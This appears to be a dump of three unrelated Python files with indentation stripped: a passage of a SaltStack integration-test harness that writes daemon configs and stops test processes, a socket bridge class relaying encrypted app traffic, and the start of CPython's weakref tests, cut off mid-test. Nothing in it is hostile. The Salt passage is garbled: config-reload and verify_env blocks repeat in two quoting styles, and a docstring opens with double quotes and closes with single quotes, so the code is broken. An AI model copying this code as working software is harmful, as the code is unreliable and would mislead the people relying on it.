syndic_master_opts['pytest_stop_sending_events_file'] = pytest_stop_sending_events_file
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = 'cache'
# proxy_opts['user'] = running_tests_user
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = 'pki'
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
master_opts.setdefault("reactor", []).append(
{"salt/test/reactor": [os.path.join(FILES, "reactor-test.sls")]}
)
master_opts.setdefault('reactor', []).append(
{
'salt/test/reactor': [
os.path.join(FILES, 'reactor-test.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
'''
try:
self.sub_minion_process.terminate()
except AttributeError:
pass
self.minion_process.terminate()
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
log.error("self.master_process can't be terminate.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
# An errors has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
BridgeConnection.py
|
import threading
from connections.Routine import Routine
from connections.SyncConnection import SyncConnection
import socket
from data_base.Routines import Routines
from utils import Networking
from utils.DH_Encryption import Encryption
from utils.SmartThread import SmartThread
class BridgeConnection:
"""
A bridge typed connection defines the flow connection between an app to a computer.
"""
def __init__(self, app: socket, sync: SyncConnection, name: str, app_crypto: Encryption):
self.app = app
self.computer = sync.sock
self.id = sync.id
self.name = name
self.comp_crypto = sync.crypto
self.app_crypto = app_crypto
self.is_active = True
self.routines = Routines(name)
self.com_proc = None
self.app_proc = None
def __str__(self):
"""
A full description of the connection
"""
return "\nApp Host: {}\nComp Host: {}\nName: {}".format(self.app.getpeername(), self.app.getpeername(),
self.name)
def activate(self):
"""
This function builds the virtual bridge between thr devices.
This bridge allows flow of unsynchronized network transportation.
If a msg in the bridge is the type of DISCONNECT it will return.
"""
self.computer.setblocking(False)
self.app_proc = SmartThread(self.__app_bridge__, "app")
self.com_proc = SmartThread(self.__comp_bridge__, "computer")
self.app_proc.start()
self.com_proc.start()
threading.Thread(target=self.is_running()).start()
def __app_bridge__(self):
try:
is_done = False
while not is_done:
msg = Networking.receive(self.app, crypto=self.app_crypto)
if msg is None:
is_done = True
elif msg != "":
split = Networking.split(msg)
if split[0] == self.name:
if Networking.get_disconnected(msg):
self.routines.name = ""
is_done = True
if split[1] == Networking.Operations.ROUTINE.value:
# split[2] - wanted time
# split[3] - time zone relative to GMT
# split[4] - ACTION
# split[5] - name
self.routines.routines.append(Routine(split[2], split[3], self.computer, self.app,
split[4], split[5], self.comp_crypto))
elif split[1] == Networking.Operations.DEL_ROUTINE.value:
# split[2] - name
for rout in self.routines.routines:
if rout.name == split[2]:
rout.kill()
self.routines.routines.remove(rout)
else:
val = Networking.send(self.computer, Networking.assemble(arr=split[1:]),
crypto=self.comp_crypto)
if not val:
is_done = True
finally:
pass
def __comp_bridge__(self):
try:
is_done = False
while not is_done:
msg = Networking.receive(self.computer, crypto=self.comp_crypto)
if msg is None:
is_done = True
elif msg != "":
if Networking.get_disconnected(msg):
Networking.send(self.app, msg, crypto=self.app_crypto)
self.routines.name = ""
is_done = True
else:
Networking.send(self.app, msg, crypto=self.app_crypto)
finally:
pass
def is_running(self):
while self.app_proc.is_alive() and self.com_proc.is_alive():
pass
t = self.app_proc if self.app_proc.is_alive() else self.com_proc
t.raise_exception()
while t.is_alive():
pass
self.computer.setblocking(True)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
